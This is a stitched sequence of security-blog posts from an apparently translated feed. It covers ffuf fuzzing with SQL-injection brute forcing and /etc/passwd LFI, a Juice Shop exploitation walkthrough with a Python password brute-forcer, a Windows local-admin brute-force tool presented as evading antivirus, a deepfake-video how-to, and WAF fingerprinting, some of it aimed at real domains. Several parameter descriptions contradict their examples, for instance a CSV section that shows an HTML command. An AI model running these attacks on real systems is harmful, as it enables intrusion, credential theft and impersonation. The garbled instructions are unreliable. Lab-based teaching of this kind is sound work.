Created by Twitter user @joohoi, cybersecurity professionals around the world have praised ffuf for its advanced capabilities, versatility, and ease of use, making it one of the top choices in fuzzing.

Before keep going, as usual, we remind you that this article was prepared for informational purposes only and does not represent a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

INSTALLATION

According to the experts of the Cyber Security 360 course, ffuf runs on a Linux terminal or Windows command prompt. Upgrading from the source code is no more difficult than compiling, except for the inclusion of “-u”.

go get -u github.com/ffuf/ffuf

For this example Kali Linux was used, so you will find ffuf in the apt repositories, which will allow you to install it by running a simple command.

apt install ffuf

After installing this program, you can use the “-h” option to invoke the help menu.

ffuf –h

ENTRY OPTIONS

These are parameters that help us provide the data needed for a web search of a URL using word lists.

Normal attack

For a normal attack, use the parameters “-u” for the target URL and “-w” to load the word list.

ffuf -u http://testphp.vulnweb.com/FUZZ/ -w dict.txt

After you run the command, you will need to focus on the results.

• First, it’s worth noting that by default it works on HTTP using the GET method
• You can also view the status of the response code (200, 204, 301, 302, 307, 401, 403, and 405). You can track the progress of the attack being performed

Using multiple word lists

The experts of the Cyber Security 360 course mention that a single list of words is not always enough to get the desired results. In these cases, you can apply multiple word lists at the same time, one of the most attractive functions of ffuf. In this example, we have granted the program access to two dictionaries (txt:W1 and txt:W2), which the tool will run at the same time:

ffuf -u https://ignitetechnologies.in/W2/W1/ -w dict.txt:W1 -w dns_dict.txt:W2

Ignore a comment in a word list

Usually, the default word list has some comments that can affect the accuracy of the results. In this case, we can use the “-ic” parameter to delete the comments. Also, to remove any banners in the tools used, use the “-s” parameter:

ffuf -u http://testphp.vulnweb.com/FUZZ/ -w dict.txt

Here we can notice that some comments are shown in the results if the above command is executed. After using the “-s” and “-ic” parameters, all comments and banners will be removed.

ffuf -u http://testphp.vulnweb.com/FUZZ/ -w dict.txt -ic –s

Extensions

It is also possible to search for a file with a specific extension on a web server using the “-e” option. All you need to do is specify the extension and name of the file along with the parameter in the appropriate command format:

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -e .php

Different queries and modes

Burp Suite is a professional platform for monitoring the security of web applications. The “cluster bomb” function allows using multiple payloads, mention the experts of the Cyber Security 360 course. There is a separate payload package for each given location; the attack goes through each payload packet one by one, checking all possible options.

There are several parameters of this tool that make it easy to use the script. For example, the “-request” parameter allows you to use the request in an attack, while “-request-proto” allows you to define the parameter itself, and “-mode” helps you choose the attack mode.

First, random credentials are used on the target URL page and the proxy server is configured to capture the request in interception mode in Burp Suite.

Now, on the Intercept tab, you need to change the credentials provided by adding HFUZZ and WFUZZ. HFUZZ is added before “uname” and WFUZZ before “pass”. Then, you need to copy and paste this query into the text and name according to the purposes of the project. In this case, the file was named as brute.txt.

Later we will move to the main attack mode, where the “-request” parameter contains a “-request-proto” text file that will help you create a prototype of http, and “-mode” will be responsible for the “cluster bomb” attack. The lists of words in question (users.txt and pass.txt) consist of SQL injections. By entering the following command, an attack will be launched:

ffuf -request brute.txt -request-proto http -mode clusterbomb -w users.txt:HFUZZ -w pass.txt:WFUZZ -mc 200

As you can see from the results of the attack, SQL injections have been successfully found to be effective for this specific purpose.

MAPPING OPTIONS

If we want the ffuf to show only the data that is important for web fuzzing, we must pay attention to these parameters. For example, it can be HTTP code, strings, words, size and regular expressions, mention the experts of the Cyber Security 360 course.

HTTP Code

To understand this configuration, you should consider a simple attack on which you will be able to see which HTTP codes appear in the results.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt

It is clear that the codes 302 HTTP and 200 HTTP were received.

If you want to see specific attacks, such as HTTP code 200, you must use the “-mc” parameter along with a specific number. To verify that this parameter works, you just need to run the following command:

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -mc 200

Line

The tool returns results for specific lines in the file using the “-ml” parameter. We can use it by specifying the strings we need.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -ml 15

Words

Similarly, since the above options correspond to a function, you can provide a result with a certain number of words. For this, use the “-mw” parameter along with the number of words you want to see in the results.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -mw 53

Size

It is also possible to use the “-ms” parameter along with the specific size you want to see in the results.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -ms 2929

Regular expressions

This is the last of all the mapping options available in ffuf. LFI fuzzing will be applied by matching the string to the subsequent “root:x” pattern for this dictionary.

A URL is used that can provide this functionality, and with the “-mr” parameter, the corresponding string “root:x” is defined. This is what a special list of words looks like.

Using this list of words, we enter the following command to add the “-mr” parameter to the attack script:

ffuf -u http://testphp.vulnweb.com/showimage.php?file=FUZZ -w dict2.txt -mr "root:x"

We received the http 200 response for /etc/passwd for this list of words.

FILTERING OPTIONS

Filtering options are the exact opposite of matching parameters. The experts of the Cyber Security 360 course recommend using these options to remove unnecessary elements during web fuzzing. It also applies to HTTP code, strings, words, size, and regular expressions.

HTTP Code

The “-fc” parameter requires a specific HTTP status code that the user wants to remove from the results.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -fc 302

Line

With the help of the “-fl” parameter, it is possible to remove a certain row from the result or filter it from the attack.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -fl 26

Size

The “-fs” option allows you to filter the specified size described by the user during the attack.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -fs 2929

Words

The “-fw” option allows you to filter the number of words of the results that the user wants to receive.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -fw 83

Regular expressions

The “-fr” option allows you to delete a specific regular expression. In this case, we will try to exclude the log files from the results.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -fr "log"

GENERAL PARAMETERS

Below are the general parameters of this tool, which are completely related to the web fuzzing process.

Automatic custom calibration

Calibration is the process of providing a measuring instrument with the information it needs to understand the context in which it will be used. When collecting data, calibrating your computer ensures that the process works accurately, mention the experts of the Cyber Security 360 course.

We can adjust this function according to the needs in each case using the “-acc” parameter, which cannot be used without the “-ac” parameter.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -acc -ac -fl 26 -ac -fs 2929 -ac -fw 54

Color

Sometimes color separation helps identify relevant details in the results. The “-c” parameter helps to divide the data into categories.ç

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt –c

Maximum task execution time

If you want to apply fuzzing for a limited period of time, you can use the “-maxtime” parameter. You must enter a command to specify the selected time interval.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -maxtime 5

Maximum turnaround time

Using the “-max time-job” parameter, the user can set a time limit for a specific job. With this command, you can limit the time it takes to complete a task or query.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -maxtime-job 2

Delay

Using the “-p” parameter, the user will add a slight delay for each request offered by the attack. According to the experts of the Cyber Security 360 course, with this feature the consultation becomes more efficient and provides clearer results.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -p 1

Query speed

We can select the request speed you need for each of the attacks using the “-rate” parameter. For example, we can create one request per second according to the desired attack.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -rate 500

Error functions

There are three parameters that support the error function. The first parameter is “-se”, a “false error” that says whether the next request is genuine or not. The second “-sf” parameter will stop the attack when more than 95% of the requests are counted as an error. The third parameter is “-sa”, a combination of the above parameters.

In the example shown below, we will use the “-se” parameter:

Ffuf -u http://ignitetechnologies.in/W2/W1/ -w dict.txt:W1 -w dns_dict.txt:W2 –se

Verbose mode

Verbose Mode is a feature used in many operating systems that provide additional information about what the computer does and what drivers and applications it loads when initialized. In programming, this mode provides accurate output for debugging purposes, making it easier to debug the program itself. To access this mode, the “-v” parameter is applied.

Ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt –v

Execution threads

The “-t” parameter is used to speed up or slow down the process. By default, it is set to 40. If you want to speed up the process, you need to increase its value.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -t 1000

OUTPUT OPTIONS

We may save the results of attacks carried out in order to keep records, improve readability and find possible links. Enter the “-o” parameter to save the output, but you must specify its format using the “-of” parameter.

Once the attack is complete, it should be checked whether the file with the output data corresponds to this format or not, mention the experts of the Cyber Security 360 course. As you can see, the file itself refers to HTML.

Output data in CSV format

Similarly, we can create CSV files using the “-of” parameter, where csv are comma-separated values. For example:

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -o file.html -of html

When the attack is complete, you need to check whether the file with the output data corresponds to this format or not. As you can see, the file itself belongs to the CSV.

Data output in all available formats

Similarly, if you want to recover data in all formats, use the “-of all” parameter. For example, it can be json, ejson, html, md, csv, ecsv.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -o output/file -of all

Now, once the attack is complete, you need to check all the files. We can see that they were saved in various formats.

HTTP OPTIONS

Sometimes the fuzzing process requires details such as an HTTP request, cookies, and an HTTP header, mention the experts of the Cyber Security 360 course.

Time-out

This feature acts as a deadline for the event to complete. The “-timeout” parameter helps to activate this option.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -timeout 5

Host header

If you want to fuzz out subdomains, you can use the “-H” parameter along with the word list of the domain name.

Ffuf -u https://google.com -w dns_dict.txt -mc 200 -H “HOST: FUZZ.google.com”

Recursion

According to the experts of the Cyber Security 360 course, this is a mechanism for reusing objects; if a program requires the user to access a function within another function, this is called a recursive call to the function. Using the “-recursion” parameter, the user can implement this functionality in their attacks.

ffuf -u "http://testphp.vulnweb.com/FUZZ/" -dict.txt –recursion

Cookie attack

There are times when fuzzing is not effective on a site where authentication is required. In these cases, we may use the “-b” parameter to use session cookies.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -b "PHPSESSID:"7aaaa6d88edcf7cd2ea4e3853ebb8bde""

Replay-proxy

There are speed limits when using the Intruder feature in the free version of Burp (Community Edition). The attack slowed down a lot, and each new “order” slowed it down even more.

In this case, the user uses the Burp Suite proxy server to get the results and evaluate them. First, you need to install the localhost proxy server on port number 8080.

Now let’s use “-replay-proxy”, which helps to get the local proxy server of the host, installed in the previous step on port number 8080.

ffuf -u http://192.168.1.12/dvwa/FUZZ/ -w dict.txt -replay-proxy http://127.0.0.1:8080 -v -mc 200

This attack will show results on two platforms. The first platform is in the Kali Linux terminal and the second is in the “HTTP history” tab in Burp Suite. With the help of various methods, you will be able to better understand the target and analyze the results of the attack.

It is common to compare ffuf with other tools such as dirb or dirbuster. While ffuf can be used for deploying brute-force attacks, its real appeal lies in simplicity.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, information technologies, and to know more details about the Cyber Security 360 course.

The post <strong>How to find zero-day vulnerabilities with Fuzz Faster U Fool (ffuf): Detailed free fuzzing tool tutorial</strong> appeared first on Information Security Newspaper | Hacking News.

This time, specialists from the International Institute of Cyber Security’s (IICS) cyber security course will show you how to install and use OWASP Juice Shop to find vulnerabilities in web applications.

Before proceeding, we remind you that this article was prepared for informational purposes only and does not represent a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

There are many ways to install Juice Shop, although cyber security course experts recommend doing so using Node.js, as Docker doesn’t have all the possible vulnerabilities.

Juice Shop works with different versions of Node.js, so we will install the latest version (Node.js v14). First you will have to install Node Version Manager, created so as not to saturate the operating system with unnecessary packages.

$curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.38.0/install.sh | bash

You must now open and close the terminal to apply the changes made by the script. Check the installed version of NVM and proceed directly to install Node.js.

$nvm -v
$nvm install --lts 

Check the version of the installed node command and remember it.

$node --version

If you need several different versions at the same time, install the necessary ones and select the last one as needed.

$ nvm install <version number>
$ nvm use <version number> 

Installing Juice Shop

There are often new releases on GitHub so the experts of the cyber security course recommend always looking for the latest version. Remember that it must be compatible with your version of Node.js; if you installed Node.js 14 in the previous step, you will need juice-shop-xx.x.x_node14_linux_x64.tgz. Download and install:

$tar -xzf juice-shop-xx.x.x_node14_linux_x64.tgz

So we complete the installation, so now it only remains to go to the Juice Shop folder to run the tool:

$npm start

If the process completed successfully, you will see the message “info: Server listening on port 3000”. Open your browser and go to http://localhost:3000. Select the English language so as not to have language problems in the future.

It will also be required to use Burp Suite or any similar tool.

Find a task board

The first thing we notice is a package that offers to find a task and results board and that is also a score board. This extremely simple problem has two solutions:

• Carefully look at the address bar like /#/search, /#/login, etc. and think, what would be the string to access the scorecard?
• Examine the source code of the website and identify relevant information. To do this, we will require access to the source code of the web browser in use

Which immediately highlights is the large number of JavaScript code; although at the moment only the main script is relevant.

Now go to the Debuger tab and look at the main source code. Here we can try to recover the code after the JS minifier using a special tool or by selecting Pretty Print Source in Firefox and get a more readable source code.

Finally we found the score board. It’s up to each one to decide how efficient it is to search the sources, but as a result, you need to come up with a piece with paths you already know as /#/search:

Type in the address bar:

http://localhost:3000/#/score-board

We have successfully completed the first task.

Juice Shop 12.7.0 has a new feature: By clicking the button with triangular brackets, you can see the source code of the vulnerable module and the line on which the error occurs. Simply compare the source code before minimization and what you saw in the browser, the experts from the cyber security course recommend.

In the screenshot above you can see two completed tasks. What happens when you try to open the path / #/complain without registering on the website? You can try to open it as a guest and send an anonymous complaint to administrators.

Open the admin panel

All tasks in the admin panel are divided by difficulty level from one to six stars. Experts in the cyber security course believe that this division is quite arbitrary.

Some tasks have a track or tutorial. Try to do it without help first. However, some tasks are so vague that it makes sense to read a more detailed description in the developer’s book. Here, for example, the “Various” category. Now let’s move on to the search for the admin panel and try to access it. It’s time to launch Burp Suite and look at the network exchange.

There’s nothing like accessing the admin panel here. It’s time to work with the debugger; the easiest way to find the right place in the code is with an access error: 403.

If we do not have a token or are denied access, error 403 will appear. Unregistered users do not have an access token, so it will be necessary to register on the website.

Now let’s try to trick the script. To do this, set a breakpoint on line 579 and add the variable t to Watch.

Try opening the admin page again. According to the experts of the cyber security course, for the breakpoint to work, you must have the debugging console open.

Now the simplest thing remains. The above script verifies whether the role matches the admin value. If not, you will see an access error. Therefore, you only need to correct the value of the role in admin. Unfortunately, with the arrival of the new developer console in Firefox, the ability to edit variables in the graphics window was broken and has not yet been returned. Remember the path to the desired value t. data. role , change in the developer window to the Console tab and change the value of the role there to admin.

Now go back to the debugger and continue running the script. This solution is rated three stars in terms of difficulty. A little later, you will register a normal administrator account and use SQLi to access the admin panel. They are much simpler, since they do not require studying the source code.

The correct server code would also not have displayed a list of users or reviews, since when requesting them from the server it had to verify the user’s rights token. In our case, this does not happen and, once in the admin panel, you can easily see all the data.

If you haven’t turned off Burp, you can look for these lines on the exchange and make sure there is no server-side permission check.

This token essentially contains the user’s full profile and explicitly specifies their original client role, but the server backend does not verify permissions when requesting all revisions or profiles. This means that by intercepting such a request, you can easily get information about registered users without even opening the admin area.

Register an administrator account

It’s time to sign up with a full administrator account. Experts in the cyber security course recommend finding out what information is sent when registering a regular account from the site. Burp Suite will help with this; run it and go through the registration process completely.

As you can see, when submitting information from the form, in response you will receive a user profile with the customer role. One of the traditional mistakes of developers is related to the so-called mass assignment, or mass filling of fields. The user registration code takes a list of profile fields to process and default values are assigned to the missing fields. Try intercepting this request before sending it and insert the username field into it, as shown in the following screenshot.

Look closely at the server’s response to understand that the username changed the response. In addition, it is no longer returned as the first row of the data. You need to understand what needs to be done with the value of the function field.

SQL injection for login

Open the user’s login window and start with the simplest case by inserting a single inverse quotation mark in the login field and an arbitrary password. Judging by the red error message, we are on the right track.

Unfortunately, it is not entirely clear what exactly is happening and how to further develop this injection. There are two solutions here: either you have extensive injection experience and systematically select the desired values, or, if it’s not you, run Burp and see what happens on the network. Remember, this is a very vulnerable app and the developers must have made more than one mistake.

There is even the code from the original SQL query. Now it will not be difficult to choose the right load for the login window.

At this stage, the experts of the cyber security course point out some important points:

• You haven’t entered your email anywhere, but you’re logged in as an administrator. This happened because in this version of the injection, the first row in the database is selected, which in most cases will be the first registered user or super administrator. this behavior is present in most content management systems (cms)
• If you have the email address of the target user, you can modify the injection a little and immediately log in on their behalf
• This is the simplest example of SQL injection. Not in vain do they occupy the first place according to the Top 10 OWASP
• There are still many places in the application code with injections, as well as tasks for it, but they are already more complicated in terms of level of execution and damage

Guess administrator passwords

This task received only two ranking stars, so we can intuit that it is a challenge of low complexity. Among the most common errors that allow this attack variant are:

• Lack of protection against brute force attacks
• Use of weak passwords
• Keyword reuse

You can try to simply guess the administrator password, it is not as difficult as it seems, although it will be best to know how to deploy keyboard attacks or enumeration.

As you can see, for login it is enough to send JSON with two fields, if the password is incorrect, you will be returned the code 401. The following code in Python may also be useful:

import requests
passwords = open('/usr/share/wordlists/rockyou.txt','r')
for password in passwords:
    password = password.rstrip("\n")
    data = {'email':'admin@juice-sh.op','password':password}
    r = requests.post('http://localhost:3000/rest/user/login',json=data)
    if r.status_code == 200:	
        print("Password is ",password)
        break
print("That's all... ")

A small recommendation: before going through the entire dictionary for unknown users, make sure that you can guess your own password and that there are no errors in the code.

Free deluxe membership

This is an easier task, the specialists of the ethical hacking course mention. To get started, start Burp and watch the entire trade with the server when trying to buy a Deluxe with no money in your wallet and cards. One of these requests includes a cost of 49 conventional units. Using Burp, convert this value to 0.

After that, on the next screen, you’ll be able to pay 0, but for some reason it won’t work that easily. If you look at the exchange, you will see the wallet payment and the error message “insufficient funds in wallet”.

We will replace paymentMode with a command such as free or deluxe:

If you carefully experiment with different payment options, you will find that it is completely optional to change the price to 0 in the first stage. The main thing is to convert the GET/rest/deluxe-membership request into a POST request and add JSON data to it as a payment mode with any value other than wallet or card, mention the experts of the cyber security course.

Juice Shop is an ideal tool to keep moving forward in the world of pentesting, so programmers can continue to turn to programs like this regardless of their skill level.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to do professional vulnerability assessment on your website for free using Juice Shop? appeared first on Information Security Newspaper | Hacking News.

As with other variants of hacking, prevention becomes a fundamental issue, as a protected computer system and constantly monitored and updated will be less exposed to privilege escalation attacks, so it is important to know this and other attack methods.

Next, specialists from the International Institute of Cyber Security’s (IICS) cyber security awareness course will show you a tool for deploying local privilege escalation attacks on Windows. The tool, called localbrute.ps1, is written in PowerShell to apply brute force against local Windows administrator accounts.

This tool is lightweight and does not require any third-party modules, making it a great addition to traditional privilege escalation methods applicable to various pentesting scenarios.

Risks of privilege escalation

An attack on local administrative accounts can be a significant attack vector, especially when an account lockout policy is missing. According to the experts of the cyber security awareness course, we can try as many login attempts as we want and, if we manage to guess the password, we will obtain full control of the system, allowing all kinds of hacking tasks such as:

• Disable all system security features
• Extract access credentials and other sensitive details
• Create raw network packets and execute exploits for subsequent attacks

The tool performs a local brute force attack on the target system, so its use is very specific. This tool can be useful in cases where user credentials exist with low privileges and where it is possible to execute commands.

Features of the tool

According to the experts of the cyber security awareness course, localbrute.ps1 makes login attempts locally to the system using native functions of the same Windows system. Among the main features are:

• Small size
• Able to make login attempts against any selected local account using the given word list
• Written in pure PowerShell
• It is not considered a malicious tool, so it is not detected by antivirus tools

There are two versions of localbrute.ps1, a regular version and a longer version. Let’s see more in detail the operation of the tool.

Using localbrute.ps1

According to the experts of the cyber security awareness course, the first thing we should consider is to define what an administrator account is in the system. These accounts typically include:

• Members of the local administrators group
• The local administrator account itself

Here’s how we can find the accounts in the Local Admins group:

net localgroup administrators

Now, run localbrute:

Import-Module .\localbrute.ps1

To continue, run the following command:

localbrute   [debug]

For example:

localbrute Administrator .\rockyou.txt

Remember that a brute force attack can take considerable time.

How does it work?

The tool simply applies brute force using a list of words for the user to try to authenticate to the system. This software uses the internal functions of Windows DirectoryServices.AccountManagement in the context of the local computer. Below is a PowerShell code snippet to verify credentials locally:

$u = 'Administrator'
$p = 'Pa$$w0rd!'
Add-Type -AssemblyName System.DirectoryServices.AccountManagement 
$t = [DirectoryServices.AccountManagement.ContextType]::Machine
$a = [DirectoryServices.AccountManagement.PrincipalContext]::new($t)
$a.ValidateCredentials($u,$p)

The extended version of the tool has some additional features to improve usability when working with large word lists. That is, it maintains a status file (localbrute.state) in the current working directory to track progress, mention the specialists of the cyber security awareness course.

After a break (^ C), the tool will type the last password found from the given word list for the given username. This allows the attack to continue after a restart.

The status file also stores records of accounts that have already been hacked.

You can enable debug mode to view the iteration in progress:

The speed is about 100 to 200 login attempts per second, depending on the performance of the target system. This is not a quick process, but it is still much more efficient than other similar tools. Running multiple instances of the localbrute script in parallel will not speed up iteration, so the experts in the cyber security awareness course do not recommend implementing these kinds of methods.

Please note that this article was prepared for informational purposes only and does not represent a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

To learn more about computer security risks, malware, vulnerabilities, information technologies, and more information about the cyber security awareness course, do not hesitate to enter the website of the International Institute of Cyber Security (IICS).

The post How to do local privilege escalation attacks on Windows to brute force the local administrator account? appeared first on Information Security Newspaper | Hacking News.

The Zero Day Initiative (ZDI) posted a message thanking those involved in the event: “Thank you again to all competitors and participating suppliers for their cooperation and for fixing the errors revealed.” Affected product vendors have 120 days to release patches for the reported flaws in Pwn2Own.

The main winners of the Pwn2Own Miami 2022 event are Daan Keuper and Thijs Alkemade of Computest Sector 7. During the first day, the team earned $20,000 USD by demonstrating a code execution attack on the Inductive Automation Ignition SCADA solution, exploiting a missing authentication flaw. During this day Computest Sector 7 also demonstrated a remote code execution (RCE) attack on AVEVA Edge HMI/SCADA, receiving a reward of $20,000 USD.

On the second day, the researchers exploited an infinite loop error to trigger a denial of service (DoS) condition against Unified Automation’s C++ demo server, earning $5,000 USD, in addition to demonstrating an authentication evasion attack on OPC Foundation OPC UA .NET Standard, earning $40,000 USD more.

Computest Sector 7 won the Master of Pwn title after winning a total of $90,000 over the three days of the contest and taking first place on the leaderboard with a total of 90 points.

This year’s Pwn2Own Miami was held in person and also allowed the remote participation of some researchers. During the first edition of Pwn2Own Miami, with the theme of ICS, held in January 2020, ZDI awarded $280,000 for the reporting of 24 zero-day vulnerabilities in ICS and SCADA products.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Pwn2Own Miami paid $400,000 USD for 26 zero-day exploits on ICS and SCADA products appeared first on Information Security Newspaper | Hacking News.

In this article, cybersecurity experts from the International Institute of Cyber Security (IICS) will show us DeepFace 2.0, a deepfake editing tool with which almost anyone can create a video from other files. As usual, remember that this article was prepared for informational purposes only and should not be taken as a call to action; IICS is not responsible for the misuse that may occur to the information contained herein.

Download and Installation

It is possible to download DeepFace from its official forum or from the GitHub repository. Cybersecurity experts recommend using NVIDIA RTC 3000 or RTX 2080Ti graphics cards for a better experience when using the tool. 

After downloading, open the file and unzip it.

When unpacking we will see a large number of .BAT files. These files will be needed to create the deepfake video.

Using the tool

There are multiple video files in the Workspace folder. We will change them to the ones we need for our specific project after changing the name.

Then we go back a folder and open the first file called “extract images from video data_sec.bat”:

After opening the command line, press Enter several times until you encounter the following image:

Once the script is finished, you will need to click on any button, mention the cybersecurity experts.

Using the same procedure, we launch the second file “extract images from video data_src.bat”.

Let’s wait for the script execution to finish.

Run the third bat file called “extract images from video data_dst FULL FPS”.

We will also have to wait for the execution of this script.

Run a bat file called “data_src faceset extract”, where you will type “wf”

Then press Enter; we must select the video card through which the processing will be carried out.

Select the video card you need by entering the number that indicates it and press Enter.

Answer the following question with the command “n” and press Enter.

At this point, videos are analyzed where the search for faces is carried out.

Then, open a file called “data_src view aligned result” to see all the scanned material, cybersecurity experts mentioned.

Close the program to proceed to the next step.

Open the “data_dst faceset extract” file:

Enter the “wf” command again, select the video card and wait for the process to finish.

Once the script is finished, we proceed to the next step.

Run the “data_dst view aligned results” file

You will be able to see the scanned material again:

Close this window and go to the next step:

Run the file “XSeg) data_dst mask for XSeg trainer – edit”

After opening the program, cybersecurity experts recommend clicking this button and start tracing the outline of the face.

We do not do it in all photos, although it will be preferable to do it where you can see a different projection.

Next, open the file “XSeg) data_src mask for XSeg trainer – edit”

We will repeat the same step using another face:

Next, open the file “XSeg) train.bat”

Select a video card and continue. Enter the command “wf” and wait for the script execution to finish.

Processing will begin now. Cybersecurity specialists point out that this could take a long time.

Then run the file “XSeg.optional) trained mask for data_dst – apply”

Select the video card again. Wait for the script to finish.

Open a file called “XSeg.optional) trained mask for data_src – apply”

The options presented below are the same as those in the previous step.

Then run the file “XSeg) data_src mask for XSeg trainer – edit”

We will open this program that is already familiar to us by clicking where it is indicated in the image shown below:

We scroll and see if the editing is correct.

Then open the XSeg file) data_dst mask for XSeg trainer”

Repeat the same procedure as in the previous step.

Next, open “XSeg) train”

Select the video card again and press Enter.

Again we will have to wait for the script to finish.

Wait for the processing to finish.

Next, open “XSeg.optional) trained mask for data_sec – apply”

Again, you need to select a video card. Select and press Enter.

Wait until the end to proceed to the next step.

Then reopen “XSeg) data_src mask for XSeg trainer – edit”

Let’s check the process:

Next, run “train SAEHD”:

After opening the command line, we first type “new” and then select the video card. All other questions can be answered by pressing Enter.

This specific question must be answered with the command “wf”:

After the questions are over, we will have to wait for the process to finish, mention the cybersecurity experts.

Run the command “merge SAEHD”

After running the script, we answer all the questions by pressing Enter.

Then, using this suggestion, we continue to adjust the face to the new image.

When you’re done, press Esc and continue.

Next, you need to open “merged to mp4”

Processing will continue to proceed; you’ll have to wait until this is over, cybersecurity experts say.

Here you can see the result.

Remember that this tool must be used with the recommended hardware and software resources to complete the process correctly; don’t put your computer at risk by trying to run tools like this with suboptimal resources.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post How to easily create deepfake videos of your family? appeared first on Information Security Newspaper | Hacking News.

According to specialists in web application security, the use of WAF solutions limits the risk of exploitation of known vulnerabilities in websites, since requests from payloads cannot reach the web server or the web application, being rejected by this security tool. That is why these solutions are a fundamental part of an adequate web security environment.

A limited solution

Implementing a WAF is not as simple as it should be, as you need to apply the correct settings. Some WAF applications simply do nothing after installation because they disable all filtering rules. Also, if all WAF rules are simply activated, the web server may stop working, as almost all web requests will be considered potentially dangerous, so web administrators will need to decide wisely which filters to implement.

There are hundreds of WAF solutions and they all vary greatly, although your configuration of some of them boils down to enabling and disabling categories of filtered threats in the web interface. To customize some of them, you need to edit text files that describe dangerous queries in your own WAF language.

To configure WAF rules as strictly as possible, Web application security specialists recommend enabling rules that deny everything except the necessary types of requests to the Web server. To do this, you need, first of all, to have a good understanding of how the protected website works, what you need and what you don’t; and, secondly, to have a good understanding of the types of attacks, how they are exploited, and how a custom WAF works.

On this occasion, web application security specialists from the International Institute of Cyber Security (IICS) will show you some tools designed to detect a WAF solution, find the manufacturer and discover possible ways to evade the filtering of malicious requests.

Wafw00f

Using Wafw00f, researchers will be able to very quickly and accurately determine the type of WAF for a specified website. In addition to this function, Wafw00f has other features:

• Crawl a site through a proxy
• Support for csv, json or plain text input and output formats

Using the program is very simple: just specify the domain of the site for which you want to find out the features of the WAF:

wafw00f URL

For example:

wafw00f wise.com

The “Number of requests” line shows the number of requests made; only two were enough. As a result, a Cloudflare WAF solution was identified.

If you think the scan may have been inaccurate, add the -a option, as a result, WAFW00F will not stop after the first match, but will check all possible records:

To send requests through a proxy, use the -p option, after which specify the proxy data: SOCKS and authentication are supported, examples of proxy parameters specified correctly:

• http://hostname:8080
• socks5://hostname:1080
• http://user:pass@hostname:8080

With the following command you can use the Tor network as a proxy:

wsudo systemctl start tor
wafw00f -p socks5://127.0.0.1:9050 admitad.com

Despite the slowness of the Tor network, the authentication of web protection (which turned out to be Defiant’s Wordfence) was very fast and only required two requests.

Targets for web security identification can be compiled into a file. When you start the program, you can specify a file with a list of supported destinations, csv, json, or text formats. For csv and json, a column or element called “url” is required. Text file format: 1 URL per line. Example:

wafw00f -i urls.txt

With the -t option you can specify which WAF you want to find, this option should be especially useful by adding the -i option:

wafw00f -i urls.txt -t 'Cloudflare (Cloudflare Inc.)'

You can display the full list of supported Web application firewalls with the following command: Web application security specialists recommend paying attention to the format in which the desired WAF is indicated. If you have any questions about how to specify the WAF correctly, go to the project page on GitHub, find the file you need, and open it. In https://github.com/EnableSecurity/wafw00f/tree/master/wafw00f/plugins, look for a line that begins with NAME, for example:

NAME = 'ACE XML Gateway (Cisco)'

The program is very fast and simple; however, due to the fact that it is impossible to change the User-Agent, sometimes the program cannot identify web protection because the server rejects requests for this tool with the default User-Agent.

IdentityYwaf

This is another simple, effective and easy-to-use program. Similar to Wafw00f, this is an identification tool that can recognize the type of web application security based on the server’s response. In addition, this tool performs additional queries to determine what types of vulnerability a web platform is protected against.

After scanning, the tool gives an estimate of the complexity to exploit vulnerabilities in the target, if any. The latest version of this program can detect more than 80 different protection products, developed by firms such as CrawlProtect, WatchGuard, Wordfence and Palo Alto, among others.

According to web application security experts, IdentityYwaf performs validation in two ways:

• Non-blind: when the WAF is identified based on messages that are its own. For example, in the message “403 (‘<title>Attention required! | Cloudflare</title>”, the name of the web application firewall is clearly shown, but at the same time it can be an attempt to confuse the attacker or pentester
• Blind: When the WAF is identified based on the payload locks sent to it

The following screenshot shows an example of a web application firewall scan:

Let’s examine the output of the program.

The type of WAF according to non-blind scanning is Wordfence, from Defiant:

[+] non-blind match: 'Wordfence (Defiant)'

A total of 45 tests were conducted with various payloads (non-threatening requests that are very similar to requests to exploit vulnerabilities):

[i] running payload tests... (45/45)

The result is presented in diagram form, in which the point is not a blocked payload, and the cross is a block of WAF in response to the sent payload:

[=] results: '..............x...x.xx.xxxxx....x.........xx.'  

The complexity of exploiting potential attacks is shown in a simple percentage format:

[=] hardness: easy (26%)

Categories of blocked attacks:

[=] blocked categories: SQLi, XSS, XXE, PT

The final decision based on the blind identification method and its probability:

[+] blind match: 'Wordfence (Defiant)' (100%)

One more test

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

